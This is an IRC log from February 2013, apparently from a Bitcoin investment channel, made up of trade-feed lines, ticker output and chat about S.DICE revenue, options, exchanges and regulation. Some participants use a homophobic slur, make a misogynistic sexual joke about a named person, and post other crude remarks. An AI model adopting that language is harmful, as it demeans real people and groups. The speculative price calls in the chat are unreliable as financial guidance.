Feb 12 21:00:19 [MPEX] [S.DICE] 1000 @ 0.0061 = 6.1 BTC [+] Feb 12 21:00:50 1 BTC = 25.57047 U.S. dollars = 19.1123926 Euros Feb 12 21:02:13 It will stay flat from here Feb 12 21:02:56 did you actually bet? or just speaking in vain? Feb 12 21:03:13 http://bitbet.us/bet/221/btc-usd-at-mtgox-will-stay-above-20-24-and/ Feb 12 21:03:34 I predict volume of ~2000 BTC / day for the rest of the month Feb 12 21:03:53 umm Feb 12 21:03:55 I mean Feb 12 21:04:16 100-150BTC revenue a day for the rest of the month Feb 12 21:04:26 however, another spike of up to 3000BTC is possible. Feb 12 21:04:32 ;;ticker Feb 12 21:04:32 BTCUSD ticker | Best bid: 25.57047, Best ask: 25.60000, Bid-ask spread: 0.02953, Last trade: 25.60000, 24 hour volume: 56715.11409378, 24 hour low: 24.00600, 24 hour high: 25.80000, 24 hour vwap: 24.96823 Feb 12 21:04:35 beyond that, I think is unlikely. Feb 12 21:04:45 Due to the BTC remaining in the whale addresses. Feb 12 21:05:07 If those addresses get more coins, of course I will reevaluate my prediction and my S.DICE positioning. Feb 12 21:05:11 i predict sunshine, snow or rain. anything beyond that is unlikely :D Feb 12 21:05:19 [MPEX] [S.DICE] 670 @ 0.0061 = 4.087 BTC [+] Feb 12 21:05:29 but most likely outcome is 9k. Feb 12 21:05:47 jesus the scams on bitcointalk never end Feb 12 21:05:53 https://bitcointalk.org/index.php?topic=143552.0 Feb 12 21:06:13 [MPEX] [S.MPOE] 8620 @ 0.00063414 = 5.4663 BTC [-] Feb 12 21:06:13 used to be that picostocks thing had the cake of most brazen bullshit, but check out that shit. Feb 12 21:14:50 [MPEX] [S.DICE] 1400 @ 0.00612297 = 8.5722 BTC [+] Feb 12 21:18:09 lmao btcjam thinks about "limiting number of active loans per user".. as if that would help anything Feb 12 21:20:33 and https://strikesapphire.com/ tells me "proxy detected - to ensure we don't accept users from jurisdictions where online gambling isn't allowed" Feb 12 21:21:07 what a bs, whatever i have here on port 80 is fine with freenode proxy checker, but not for them Feb 12 21:22:39 lol Feb 12 21:22:52 freenode isn't taking your money for gambling Feb 12 21:24:49 [MPEX] [S.DICE] 1000 @ 0.006399 = 6.399 BTC [+] Feb 12 21:27:29 but they do check rigorously for open proxies Feb 12 21:28:23 yeah, but that's for anti-spamming, not to cover their asses legally Feb 12 21:28:30 bugpowder: I see. well, hopefully the whale comes back. He spoiled us for a while there! Feb 12 21:28:51 !ticker m s.dice Feb 12 21:28:53 [MPEX:S.DICE] 1D: 0.00598091 / 0.00625286 / 0.0064 (34005 shares, 212.63 BTC), 7D: 0.004321 / 0.00608436 / 0.00677999 (3373219 shares, 20,523.90 BTC), 30D: 0.00085848 / 0.00557722 / 0.0075 (8359458 shares, 46,622.54 BTC) Feb 12 21:29:15 ;;calc 557722 * .13 / 12 Feb 12 21:29:16 6041.98833333 Feb 12 21:29:30 actually, as long as sdice makes 6k btc a month it covers inflation. Feb 12 21:32:35 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.40120001 = 401.2 BTC [-] Feb 12 21:35:16 [MPEX] [S.MPOE] 5367 @ 0.00065046 = 3.491 BTC [+] Feb 12 21:35:18 [MPEX] [S.MPOE] 4321 @ 0.00065614 = 2.8352 BTC [+] Feb 12 21:35:20 [MPEX] [S.MPOE] 16159 @ 0.00065615 = 10.6027 BTC [+] Feb 12 21:39:46 are S.DICE financials all denominated in BTC? Feb 12 21:40:09 iz, what's the difference, really? either i do have open proxy here or not Feb 12 21:40:51 SpNg: yes . and they won't touch fiat at all Feb 12 21:41:14 SpNg: yes, and here's last month's P&L statement: https://docs.google.com/spreadsheet/ccc?key=0Aiec3-Eo_yO5dHB2dVdiaEltUHAtTWlBcFhXQVBYeGc#gid=0 Feb 12 21:41:26 jurov: ok, good to know. Feb 12 21:41:33 bid wall at 25.70! Feb 12 21:41:42 maximian: I found that yesterday. S.DICE is doing pretty well ;-) Feb 12 21:41:56 yep, it's a great business Feb 12 21:41:59 blarg... ask wall at 25.80 Feb 12 21:42:04 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.40063855 = 400.6386 BTC [-] Feb 12 21:42:29 maximian: I'm surprised it's doing that amount of business too. The concept is fairly straight forward. Growth has been amazing on it too Feb 12 21:42:50 another boring revenue day for sdice Feb 12 21:43:04 i see the puts are moving Feb 12 21:43:12 https://bitcointalk.org/index.php?topic=80312.msg1522277#msg1522277 Feb 12 21:44:03 interesting graph. blue a little lower black a little higher ? Feb 12 21:44:06 revenue goes up in bursts Feb 12 21:44:16 that's new isn't it ? usually 4 and under drives the profits. Feb 12 21:49:47 usually 4 and over drives profits Feb 12 21:50:20 but there was 1 guy recently that was just hammering 1 and 2 BTC bets on many different levels Feb 12 21:51:12 a ok Feb 12 21:56:11 I wonder if its the same guy shorting the 350s that got burned last time... Feb 12 21:56:38 Seems premature to short the puts, IMHO Feb 12 21:56:56 h Feb 12 21:57:02 hurrr. actually ok Feb 12 21:57:09 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.40063855 = 400.6386 BTC [-] Feb 12 21:57:09 premature to BUY puts :-P Feb 12 21:57:11 how yah Feb 12 21:57:14 its him Feb 12 21:57:21 i wonder if with his luck we should be scared. Feb 12 21:57:27 lol Feb 12 21:58:08 how to lose 4,500BTC in 24 hours or less Feb 12 21:58:09 what's that, the 3rd k ? Feb 12 21:58:14 ya Feb 12 21:58:28 i wonder how long he goes at it this time Feb 12 21:58:35 like, pound bot continuously till opex ? Feb 12 21:59:27 sup Feb 12 22:00:14 moar like soup Feb 12 22:00:17 [MPEX] [O.BTCUSD.C150T] 1 @ 0.40161617 BTC [+] Feb 12 22:00:19 [MPEX] [S.MPOE] 4321 @ 0.00065247 = 2.8193 BTC [-] Feb 12 22:00:26 [MPEX] [S.MPOE] 11100 @ 0.00065264 = 7.2443 BTC [+] Feb 12 22:00:28 [MPEX] [S.MPOE] 13600 @ 0.00065342 = 8.8865 BTC [+] Feb 12 22:00:30 [MPEX] [S.MPOE] 2079 @ 0.00065615 = 1.3641 BTC [+] Feb 12 22:03:17 [MPEX] [S.MPOE] 5680 @ 0.00063414 = 3.6019 BTC [-] Feb 12 22:03:18 [MPEX] [S.MPOE] 4321 @ 0.00063397 = 2.7394 BTC [-] Feb 12 22:03:22 [MPEX] [S.MPOE] 5099 @ 0.00063396 = 3.2326 BTC [-] Feb 12 22:03:36 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [+] Feb 12 22:04:03 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.39895687 = 398.9569 BTC [-] Feb 12 22:04:34 well on the positive side i think mpex monthly volume is at a new record Feb 12 22:06:06 [MPEX] [S.DICE] 1000 @ 0.0060123 = 6.0123 BTC [-] Feb 12 22:08:42 [MPEX] [S.MPOE] 3401 @ 0.00063396 = 2.1561 BTC [-] Feb 12 22:08:44 [MPEX] [S.MPOE] 4321 @ 0.00063282 = 2.7344 BTC [-] Feb 12 22:08:45 [MPEX] [S.MPOE] 19711 @ 0.00063281 = 12.4733 BTC [-] Feb 12 22:13:09 [MPEX] [S.DICE] 730 @ 0.0061 = 4.453 BTC [+] Feb 12 22:14:01 [MPEX] [O.BTCUSD.P350T] 1000 @ 0.39895687 = 398.9569 BTC [-] Feb 12 22:18:29 [MPEX] [S.MPOE] 4321 @ 0.00064192 = 2.7737 BTC [+] Feb 12 22:18:31 [MPEX] [S.MPOE] 3579 @ 0.00064225 = 2.2986 BTC [+] Feb 12 22:21:42 [MPEX] [S.DICE] 10000 @ 0.0062 = 62 BTC [+] Feb 12 22:28:57 [MPEX] [S.MPOE] 4321 @ 0.00063407 = 2.7398 BTC [-] Feb 12 22:28:59 [MPEX] [S.MPOE] 7379 @ 0.00063437 = 4.681 BTC [+] Feb 12 22:33:27 [MPEX] [S.MPOE] 3997 @ 0.00063437 = 2.5356 BTC [+] Feb 12 22:35:40 [MPEX] [S.MPOE] 4037 @ 0.00063281 = 2.5547 BTC [-] Feb 12 22:35:42 [MPEX] [S.MPOE] 4321 @ 0.00063187 = 2.7303 BTC [-] Feb 12 22:35:44 [MPEX] [S.MPOE] 6200 @ 0.00063186 = 3.9175 BTC [-] Feb 12 22:35:45 [MPEX] [S.MPOE] 12542 @ 0.00063131 = 7.9179 BTC [-] Feb 12 22:42:13 1 BTC = 25.64900 U.S. dollars = 19.171089 Euros Feb 12 22:57:05 [MPEX] [S.MPOE] 1324 @ 0.00063437 = 0.8399 BTC [+] Feb 12 22:57:07 [MPEX] [S.MPOE] 4321 @ 0.00064219 = 2.7749 BTC [+] Feb 12 22:57:09 [MPEX] [S.MPOE] 7323 @ 0.0006422 = 4.7028 BTC [+] Feb 12 22:58:01 [MPEX] [S.MPOE] 4321 @ 0.00064202 = 2.7742 BTC [-] Feb 12 22:58:03 [MPEX] [S.MPOE] 4321 @ 0.00064205 = 2.7743 BTC [+] Feb 12 22:58:09 [MPEX] [S.MPOE] 5058 @ 0.00064225 = 3.2485 BTC [+] Feb 12 23:01:03 [MPEX] [S.MPOE] 11681 @ 0.00064225 = 7.5021 BTC [+] Feb 12 23:08:40 [BTCTC] [B.YABMC] 10 @ 0.0224 = 0.224 BTC [-] Feb 12 23:08:42 [BTCTC] [B.YABMC] 10 @ 0.0223 = 0.223 BTC [-] Feb 12 23:08:44 [BTCTC] [B.YABMC] 10 @ 0.0222 = 0.222 BTC [-] Feb 12 23:08:45 [BTCTC] [B.YABMC] 10 @ 0.0221 = 0.221 BTC [-] Feb 12 23:08:47 [BTCTC] [B.YABMC] 50 @ 0.022 = 1.1 BTC [-] Feb 12 23:08:48 [BTCTC] [B.YABMC] 15 @ 0.0216 = 0.324 BTC [-] Feb 12 23:08:49 [BTCTC] [B.YABMC] 13 @ 0.0215 = 0.2795 BTC [-] Feb 12 23:08:50 [BTCTC] [B.YABMC] 8 @ 0.0214 = 0.1712 BTC [-] Feb 12 23:08:52 [BTCTC] [B.YABMC] 12 @ 0.0213 = 0.2556 BTC [-] Feb 12 23:08:53 [BTCTC] [B.YABMC] 10 @ 0.0212 = 0.212 BTC [-] Feb 12 23:08:55 [BTCTC] [B.YABMC] 100 @ 0.02 = 2 BTC [-] Feb 12 23:15:30 ASICMINER testing? https://bitcointalk.org/index.php?topic=49417.msg1522065#msg1522065 Feb 12 23:16:23 MY PENIS IS SO HARD RIGHT NOW. Feb 12 23:17:17 lol Feb 12 23:17:35 [MPEX] [S.DICE] 3250 @ 0.0062 = 20.15 BTC [+] Feb 12 23:22:55 EskimoBob: nope. Feb 12 23:24:02 [HAVELOCK] [HIM] 1 @ 14.1 BTC [+] Feb 12 23:24:36 [MPEX] [S.MPOE] 18050 @ 0.0006441 = 11.626 BTC [+] Feb 12 23:26:47 https://bitcointalk.org/index.php?topic=143588.msg1510029;boardseen#new Feb 12 23:26:48 ?? Feb 12 23:27:01 [HAVELOCK] [SDICE] 10 @ 0.73600002 = 7.36 BTC [-] Feb 12 23:27:11 !ticker Feb 12 23:27:12 How can I be of assistance, my poor man? Feb 12 23:27:27 ;;ticker Feb 12 23:27:28 BTCUSD ticker | Best bid: 25.52099, Best ask: 25.59999, Bid-ask spread: 0.07900, Last trade: 25.60000, 24 hour volume: 58636.80403702, 24 hour low: 24.28002, 24 hour high: 25.82767, 24 hour vwap: 25.11691 Feb 12 23:27:39 EskimoBob: no? Feb 12 23:27:48 EskimoBob: I did the math, batch #3 avalon is too late Feb 12 23:27:58 they'd have to cut the price in half and/or double the performance Feb 12 23:28:02 Bugpowdurr hurrr Feb 12 23:30:52 [MPEX] [S.MPOE] 24835 @ 0.00065303 = 16.218 BTC [+] Feb 12 23:33:01 i should post mircea's words to the wall thread.. maybe he meant 200k BTC, not 200 :D Feb 12 23:34:42 lmao Feb 12 23:34:55 im not on mtgox, and it wasn't me. Feb 12 23:35:27 mircea_popescu has like half the bitcoins in all existence Feb 12 23:35:32 and like 3 bitches, at least 3 Feb 12 23:35:44 https://bitcointalk.org/index.php?topic=124441.msg1522320#msg1522320 Feb 12 23:35:50 one for the cleaning, one for the cooking, and one for the blowjobbing. Feb 12 23:35:54 i would like to address this question at this time. Feb 12 23:36:00 i do not has half the bitcoins Feb 12 23:36:02 You know, we're open to North Korea but we don't get any players from there either. It's not my problem. Feb 12 23:36:29 mircea_popescu but that won't stop me joking Feb 12 23:37:04 that thread is getting like a life of its own huh Feb 12 23:37:45 so if you talk with lawyer you'll end up with online casino for north koreans Feb 12 23:37:59 that's what the doos is trying to say or? Feb 12 23:38:02 *dood Feb 12 23:38:56 jurov you know, he totally owned you Feb 12 23:39:02 Inaba is dumb. Feb 12 23:39:03 if you were american it;'d work Feb 12 23:39:39 inaba isnt dumb as much as well paid Feb 12 23:39:41 course now you tell him you're from slovakistan... Feb 12 23:40:22 no i;ll prolly ask him whether there aren't sanctions for trade with north korea, too Feb 12 23:40:34 like they do with cuba Feb 12 23:40:45 or iran Feb 12 23:40:51 hello sir i tell you absolutely no trok at all! Feb 12 23:41:04 ? Feb 12 23:41:16 it's this histerical video one sec Feb 12 23:41:34 http://www.youtube.com/watch?v=XdguyMJprsA Feb 12 23:47:18 [BTCTC] [GSDPT] 10 @ 0.0062 = 0.062 BTC [-] Feb 12 23:47:25 [BTCTC] [GSDPT] 10 @ 0.0061 = 0.061 BTC [-] Feb 12 23:47:35 [BTCTC] [GSDPT] 16 @ 0.00607 = 0.0971 BTC [-] Feb 12 23:48:24 [MPEX] [S.DICE] 700 @ 0.00599414 = 4.1959 BTC [-] Feb 12 23:50:19 [MPEX] [S.DICE] 800 @ 0.00599414 = 4.7953 BTC [-] Feb 12 23:50:57 [MPEX] [S.MPOE] 27400 @ 0.00065303 = 17.893 BTC [+] Feb 12 23:57:10 [BTCTC] [GSDPT] 100 @ 0.006 = 0.6 BTC [-] Feb 12 23:57:22 [MPEX] [S.MPOE] 2800 @ 0.00064537 = 1.807 BTC [-] Feb 12 23:57:24 [MPEX] [S.MPOE] 25450 @ 0.0006441 = 16.3923 BTC [-] Feb 13 00:00:48 [BTCTC] [BTC-TRADING-PT] 4 @ 0.1208 = 0.4832 BTC [-] Feb 13 00:01:40 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1167 BTC [-] Feb 13 00:01:42 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1159 BTC [-] Feb 13 00:03:22 [MPEX] [S.MPOE] 6750 @ 0.0006441 = 4.3477 BTC [-] Feb 13 00:04:15 maybe in future we'll have anti-discriminations covenants covering IP addresses lol Feb 13 00:04:44 or parts of world firewalling off each other... that's more likely, sadly Feb 13 00:07:28 That guy has some fucking timing with the puts. Feb 13 00:08:24 sheeeit. DIdn't even clear out the wall at 25.60 Feb 13 00:08:38 This could be the end Feb 13 00:09:59 .39/.51 market for the 35 puts Feb 13 00:12:02 [HAVELOCK] [SDICE] 6 @ 0.7544899 = 4.5269 BTC [+] Feb 13 00:13:18 so,we're basically standing in USG bear traps. https://bitcointalk.org/index.php?topic=124441.msg1522652#msg1522652 Feb 13 00:13:53 ;;ticker Feb 13 00:13:54 BTCUSD ticker | Best bid: 25.01112, Best ask: 25.15999, Bid-ask spread: 0.14887, Last trade: 25.12000, 24 hour volume: 65692.69911298, 24 hour low: 24.29575, 24 hour high: 25.82767, 24 hour vwap: 25.12086 Feb 13 00:13:56 what srsly ?! Feb 13 00:14:07 omfg Feb 13 00:14:35 Lyspooner some whale sold 5k of the 350T puts Feb 13 00:14:38 [MPEX] [S.MPOE] 8669 @ 0.0006441 = 5.5837 BTC [-] Feb 13 00:14:39 [MPEX] [S.MPOE] 24831 @ 0.00064269 = 15.9586 BTC [-] Feb 13 00:14:50 last month someone whalish doing similar things ended up giving the bot 4-5k Feb 13 00:15:43 [MPEX] [S.MPOE] 12772 @ 0.00064735 = 8.268 BTC [+] Feb 13 00:15:45 [MPEX] [S.MPOE] 8428 @ 0.00065303 = 5.5037 BTC [+] Feb 13 00:17:04 re the something awful, this just in http://polimedia.us/dtng/c/res/18313.html#18321 Feb 13 00:17:22 DONT PANIC Feb 13 00:17:32 ask wall at 25.65 IS gone Feb 13 00:17:40 RALLY IS BACK ON Feb 13 00:18:18 [MPEX] [S.DICE] 1100 @ 0.00599414 = 6.5936 BTC [-] Feb 13 00:19:48 you're against lol? Feb 13 00:20:52 hm, so i'm living off playmoney? Feb 13 00:21:01 i've no problem however to call it Feb 13 00:21:05 you think that's air you're breathing? Feb 13 00:21:52 Lyspooner you ask me? no i just breathe playstuff :D Feb 13 00:22:27 because you can't do this! Feb 13 00:22:46 that was ragequit or? Feb 13 00:24:47 ya'll watching huffpost Feb 13 00:25:00 http://live.huffingtonpost.com/r/segment/-black-history-of-the-white-house/510f071602a760338c00064b Feb 13 00:25:10 [MPEX] [S.MPOE] 32000 @ 0.00064269 = 20.5661 BTC [-] Feb 13 00:25:35 [BTCTC] [S.DICE-PT] 200 @ 0.0063 = 1.26 BTC [+] Feb 13 00:26:05 evoorhees, shrem, and ver Feb 13 00:26:12 talking about coins Feb 13 00:26:20 LIVE NOW Feb 13 00:26:26 participate Feb 13 00:26:50 [BTCTC] [RSM] 1 @ 0.0099 BTC [+] Feb 13 00:27:41 [BTCTC] [RSM] 49 @ 0.0099 = 0.4851 BTC [+] Feb 13 00:28:26 i've noticed lyspooner quitbombs Feb 13 00:28:43 [MPEX] [S.MPOE] 1562 @ 0.00065303 = 1.02 BTC [+] Feb 13 00:28:45 [MPEX] [S.MPOE] 2438 @ 0.00065303 = 1.5921 BTC [+] Feb 13 00:30:54 political statement by ver Feb 13 00:32:29 anything good ? Feb 13 00:34:05 Roger fuckin kicked ass! Feb 13 00:34:07 perfect Feb 13 00:34:16 he did well Feb 13 00:37:32 Shut up truffles you fag Feb 13 00:37:55 he's right, stfu Feb 13 00:38:31 if you want troll do it somewhere else. Feb 13 00:43:05 [MPEX] [S.MPOE] 2606 @ 0.00064269 = 1.6749 BTC [-] Feb 13 00:44:25 [MPEX] [S.MPOE] 7750 @ 0.00064269 = 4.9808 BTC [-] Feb 13 00:49:29 ;;ticker Feb 13 00:49:29 BTCUSD ticker | Best bid: 24.91954, Best ask: 24.91959, Bid-ask spread: 0.00005, Last trade: 24.91959, 24 hour volume: 67001.84703132, 24 hour low: 24.30001, 24 hour high: 25.82767, 24 hour vwap: 25.12926 Feb 13 00:49:46 top is actually in ?! Feb 13 00:50:22 [MPEX] [S.MPOE] 4213 @ 0.00064269 = 2.7077 BTC [-] Feb 13 00:50:24 [MPEX] [S.MPOE] 4321 @ 0.000638 = 2.7568 BTC [-] Feb 13 00:50:26 [MPEX] [S.MPOE] 531 @ 0.00063799 = 0.3388 BTC [-] Feb 13 00:50:54 looks like it… Feb 13 00:52:57 [MPEX] [S.MPOE] 4321 @ 0.00063824 = 2.7578 BTC [+] Feb 13 00:52:59 [MPEX] [S.MPOE] 10219 @ 0.00063799 = 6.5196 BTC [-] Feb 13 00:53:01 [MPEX] [S.MPOE] 4560 @ 0.00063501 = 2.8956 BTC [-] Feb 13 01:00:04 [HAVELOCK] [KCIM] 7 @ 0.99 = 6.93 BTC [+] Feb 13 01:01:53 [MPEX] [S.MPOE] 4321 @ 0.00065272 = 2.8204 BTC [+] Feb 13 01:01:55 [MPEX] [S.MPOE] 6729 @ 0.00065303 = 4.3942 BTC [+] Feb 13 01:16:07 its gettin ugly Feb 13 01:21:48 tanking Feb 13 01:22:47 ;;ticker Feb 13 01:22:47 BTCUSD ticker | Best bid: 24.42101, Best ask: 24.51999, Bid-ask spread: 0.09898, Last trade: 24.42101, 24 hour volume: 71605.40106831, 24 hour low: 24.30010, 24 hour high: 25.82767, 24 hour vwap: 25.09591 Feb 13 01:22:52 dude. Feb 13 01:22:56 this is so far out there... Feb 13 01:23:35 do u have faith? Feb 13 01:24:09 weird that is like totally opposite of me Feb 13 01:26:18 pretty big move, but no asks are filling in behind Feb 13 01:27:19 we were overdue.... Feb 13 01:28:26 roger ver is quite fuckable Feb 13 01:29:31 ask gettin eaten Feb 13 01:29:48 [BTCTC] [BTC-BOND] 8 @ 0.00999 = 0.0799 BTC [-] Feb 13 01:30:07 [BTCTC] [BTC-BOND] 17 @ 0.01 = 0.17 BTC [+] Feb 13 01:31:39 ;;ticker Feb 13 01:31:40 BTCUSD ticker | Best bid: 24.70000, Best ask: 24.74000, Bid-ask spread: 0.04000, Last trade: 24.70000, 24 hour volume: 72844.90194483, 24 hour low: 24.30010, 24 hour high: 25.82767, 24 hour vwap: 25.08584 Feb 13 01:34:00 [MPEX] [S.MPOE] 4321 @ 0.00064663 = 2.7941 BTC [-] Feb 13 01:34:02 [MPEX] [S.MPOE] 11000 @ 0.00064628 = 7.1091 BTC [-] Feb 13 01:34:03 [MPEX] [S.MPOE] 13479 @ 0.00064213 = 8.6553 BTC [-] Feb 13 01:37:26 [MPEX] [S.MPOE] 10500 @ 0.00064703 = 6.7938 BTC [+] Feb 13 01:37:28 [MPEX] [S.MPOE] 4321 @ 0.00065296 = 2.8214 BTC [+] Feb 13 01:37:41 [MPEX] [S.MPOE] 1679 @ 0.00065303 = 1.0964 BTC [+] Feb 13 01:38:36 Nothing enforces my faith in this rally more than the 40% spread in the option contracts. :) Feb 13 01:38:49 lol Feb 13 01:38:57 lol Feb 13 01:39:09 here comes the bounce... Feb 13 01:39:09 and bitstamp asks got slaughtered Feb 13 01:39:30 holy fff Feb 13 01:39:34 bitstamp lol Feb 13 01:39:58 I should send some coins over there Feb 13 01:41:31 Hallelujah! Feb 13 01:42:22 الله اکبر Feb 13 01:43:48 http://jezus.si:81/render?target=bitcoin.*.transactions&height=500&width=1100&lineMode=connected Feb 13 01:45:40 [MPEX] [S.DICE] 500 @ 0.00629999 = 3.15 BTC [+] Feb 13 01:45:45 [MPEX] [S.DICE] 3500 @ 0.0063 = 22.05 BTC [+] Feb 13 01:47:39 [MPEX] [S.MPOE] 71 @ 0.00064213 = 0.0456 BTC [-] Feb 13 01:47:41 [MPEX] [S.MPOE] 540 @ 0.00063501 = 0.3429 BTC [-] Feb 13 01:47:44 [MPEX] [S.MPOE] 3409 @ 0.00063131 = 2.1521 BTC [-] Feb 13 01:47:46 [MPEX] [S.MPOE] 680 @ 0.00063095 = 0.429 BTC [-] Feb 13 01:48:24 [MPEX] [S.MPOE] 3641 @ 0.00063095 = 2.2973 BTC [-] Feb 13 01:48:25 [MPEX] [S.MPOE] 4321 @ 0.00063095 = 2.7263 BTC [-] Feb 13 01:48:26 [MPEX] [S.MPOE] 18238 @ 0.00063094 = 11.5071 BTC [-] Feb 13 02:06:56 Whats your typical annual return from dividends in the brick and mortar world of stock markets? Feb 13 02:11:29 something beween 0.x% and a few % Feb 13 02:15:29 [MPEX] [S.MPOE] 9530 @ 0.00064188 = 6.1171 BTC [+] Feb 13 02:15:29 [MPEX] [S.MPOE] 4321 @ 0.00065291 = 2.8212 BTC [+] Feb 13 02:15:32 [MPEX] [S.MPOE] 849 @ 0.00065303 = 0.5544 BTC [+] Feb 13 02:18:17 [MPEX] [S.MPOE] 4321 @ 0.00063126 = 2.7277 BTC [-] Feb 13 02:18:19 [MPEX] [S.MPOE] 6373 @ 0.00063094 = 4.021 BTC [-] Feb 13 02:22:18 [MPEX] [S.DICE] 500 @ 0.006 = 3 BTC [-] Feb 13 02:29:55 [MPEX] [S.MPOE] 4321 @ 0.00064975 = 2.8076 BTC [+] Feb 13 02:29:56 [MPEX] [S.MPOE] 21165 @ 0.00064953 = 13.7473 BTC [-] Feb 13 02:32:10 [MPEX] [S.MPOE] 3900 @ 0.00064953 = 2.5332 BTC [-] **** BEGIN LOGGING AT Wed Feb 13 13:56:33 2013 Feb 13 13:59:11 [BTCTC] [GSDPT] 100 @ 0.00625 = 0.625 BTC [+] Feb 13 14:00:38 ;;ticker Feb 13 14:00:39 BTCUSD ticker | Best bid: 25.58102, Best ask: 25.70000, Bid-ask spread: 0.11898, Last trade: 25.58102, 24 hour volume: 71191.01497053, 24 hour low: 24.40000, 24 hour high: 25.82767, 24 hour vwap: 25.23932 Feb 13 14:04:56 [BTCTC] [MININGCO.ETF] 8 @ 0.57 = 4.56 BTC [+] Feb 13 14:06:08 hey jurov Feb 13 14:06:10 hey mircea Feb 13 14:06:19 what's new Feb 13 14:06:52 hi, should be? Feb 13 14:06:59 think i will be getting a referral soon for coinbr soon Feb 13 14:07:13 oh yes, i'm on it Feb 13 14:07:15 my friend is finally getting sick of watching my returns and wants to get in Feb 13 14:07:50 [BTCTC] [RSM] 100 @ 0.0099 = 0.99 BTC [+] Feb 13 14:08:03 i mean, we have to be sure all is correct before paying out referrals Feb 13 14:08:15 yeah of course Feb 13 14:08:20 so they're paid very infrequently, like once a month Feb 13 14:08:24 mostly just want to get more people into the bitcoin world Feb 13 14:08:30 it's gonne be better Feb 13 14:08:32 yeah of course that is fine Feb 13 14:09:14 but you have made trading and investing on mpex very easy to use Feb 13 14:09:42 i am really hoping that a bunch of these US btc exchanges start taking off Feb 13 14:09:44 and otherwise all is well, s.mpoe behaves nicely for the bot to feed on again Feb 13 14:09:53 having all the volume going through mt. gox makes me nervous Feb 13 14:10:24 i'd be nervous instead if all the volumewent thru some us exchange Feb 13 14:10:38 with all the sec/doj freaks Feb 13 14:10:53 true Feb 13 14:11:07 i just would like the volume to be split through 20 exchanges all across the world Feb 13 14:12:16 perhaps it will, after margins get squeezed, local exchanges may get upper hand Feb 13 14:12:44 [MPEX] [S.MPOE] 4321 @ 0.00065611 = 2.8351 BTC [-] Feb 13 14:12:46 [MPEX] [S.MPOE] 7106 @ 0.00065606 = 4.662 BTC [-] Feb 13 14:12:47 [MPEX] [S.MPOE] 17508 @ 0.00064956 = 11.3725 BTC [-] Feb 13 14:13:52 [MPEX] [S.MPOE] 4321 @ 0.00065883 = 2.8468 BTC [+] Feb 13 14:13:54 [MPEX] [S.MPOE] 20198 @ 0.00065914 = 13.3133 BTC [+] Feb 13 14:13:56 [MPEX] [S.MPOE] 23381 @ 0.00065941 = 15.4177 BTC [+] Feb 13 14:15:22 [BTCTC] [BASIC-MINING] 2 @ 0.35 = 0.7 BTC [+] Feb 13 14:15:48 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [+] Feb 13 14:16:37 think we'll see 26 today? Feb 13 14:17:20 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Feb 13 14:17:31 possibly. Feb 13 14:17:36 i cashed out at 24.21 yest, am really not interested in such discussions :D Feb 13 14:18:21 mircea_popescu hello, have you seen the newspost about russians officially forbidden to own foreign securities? Feb 13 14:19:27 nope Feb 13 14:19:30 hosted.ap.org/dynamic/stories/E/EU_RUSSIA_FOREIGN_ACCOUNTS Feb 13 14:19:52 time to add russian faq to mpex (and for me to search for translator) Feb 13 14:21:13 that article was referring to specifically people in politics Feb 13 14:21:16 that is the first point Feb 13 14:21:31 the second point is that they are doing that to try and lessen influence from outside countries and lobbyists Feb 13 14:21:42 it is an anti-corruption initiative Feb 13 14:22:18 [BTCTC] [COGNITIVE] 3 @ 0.3255 = 0.9765 BTC [+] Feb 13 14:22:53 some people view it as isolationist Feb 13 14:23:06 but in general, i don't think it has much to do with currency exchange Feb 13 14:24:23 [BTCTC] [COGNITIVE] 10 @ 0.33 = 3.3 BTC [+] Feb 13 14:24:46 [MPEX] [S.MPOE] 2285 @ 0.00064956 = 1.4842 BTC [-] Feb 13 14:24:48 [MPEX] [S.MPOE] 4321 @ 0.00064828 = 2.8012 BTC [-] Feb 13 14:24:49 [BTCTC] [SYNERGY] 1 @ 0.1197 BTC [+] Feb 13 14:24:50 [MPEX] [S.MPOE] 14344 @ 0.00064827 = 9.2988 BTC [-] Feb 13 14:25:25 i just meant that more people can get motivated to put their savings into btc Feb 13 14:25:37 cause btc is quite well known in russia Feb 13 14:27:16 and it's likely putin will try to extend this "protection" to others, for example to all govt employees Feb 13 14:27:24 [BTCTC] [COGNITIVE] 4 @ 0.338 = 1.352 BTC [+] Feb 13 14:27:41 and their underage children, lol Feb 13 14:30:10 [BTCTC] [ESECURITYSABTC] 1 @ 0.747 BTC [+] Feb 13 14:31:25 hm, it can be said that way, why? Feb 13 14:32:17 [BTCTC] [COGNITIVE] 1 @ 0.34 BTC [+] Feb 13 14:34:47 ic. just to remind me. thx. Feb 13 14:35:48 https://bitcointalk.org/index.php?topic=141638.0;all lol check out all the interest for things mpoe-pr DOESNT shoot down Feb 13 14:38:43 https://bitcointalk.org/index.php?topic=143766.0 sdice experts nao. confused by ipo shit, plays and wins every time. dun dun. Feb 13 14:43:29 [BTCTC] [ESECURITYSABTC] 1 @ 0.75 BTC [+] Feb 13 14:44:21 [BTCTC] [B.YABMC] 80 @ 0.02479 = 1.9832 BTC [+] Feb 13 14:44:46 [BTCTC] [ESECURITYSABTC] 1 @ 0.75 BTC [+] Feb 13 14:45:49 [BTCTC] [PAJKA.BOND] 1 @ 0.0699 BTC [-] Feb 13 14:47:51 [BTCTC] [MININGCO.ETF] 4 @ 0.57 = 2.28 BTC [+] Feb 13 14:49:33 [MPEX] [S.MPOE] 4321 @ 0.00065251 = 2.8195 BTC [+] Feb 13 14:49:35 [MPEX] [S.MPOE] 12179 @ 0.00065255 = 7.9474 BTC [+] Feb 13 14:50:11 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1091 BTC [-] Feb 13 14:52:49 [MPEX] [S.MPOE] 1855 @ 0.00065255 = 1.2105 BTC [+] Feb 13 14:52:51 [MPEX] [S.MPOE] 2700 @ 0.00065779 = 1.776 BTC [+] Feb 13 14:52:53 [MPEX] [S.MPOE] 195 @ 0.00065941 = 0.1286 BTC [+] Feb 13 14:53:26 [BTCTC] [PAJKA.BOND] 4 @ 0.07 = 0.28 BTC [+] Feb 13 14:54:04 [BTCTC] [PAJKA.BOND] 20 @ 0.075 = 1.5 BTC [+] 